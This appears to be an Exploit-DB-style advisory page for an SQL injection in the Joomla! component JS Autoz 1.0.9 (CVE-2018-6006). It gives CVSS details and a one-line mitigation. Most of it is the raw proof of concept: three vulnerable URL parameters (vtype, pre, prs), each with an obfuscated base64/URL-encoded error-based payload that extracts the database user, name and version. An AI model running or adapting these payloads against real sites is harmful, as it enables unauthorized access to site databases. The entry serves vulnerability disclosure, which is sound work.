Joomla! Component JS Autoz 1.0.9 - SQL Injection

vendor:

JS Autoz

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: JS Autoz

Affected Version From: 1.0.9

Affected Version To: 1.0.9

Patch Exists: YES

Related CWE: CVE-2018-6006

CPE: a:joomsky:js_autoz:1.0.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component JS Autoz 1.0.9 – SQL Injection

Joomla! Component JS Autoz 1.0.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter. This can be exploited to gain access to the database and execute malicious code.

Mitigation:

Developers should always use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious data from entering the system.

Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component JS Autoz 1.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/js-autoz/
# Software Download: http://joomsky.com/js-autoz-download.html
# Version: 1.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6006
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=[SQL]
#  
# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=[SQL]
#  
# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=[SQL]
#  
# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
#  
# # # #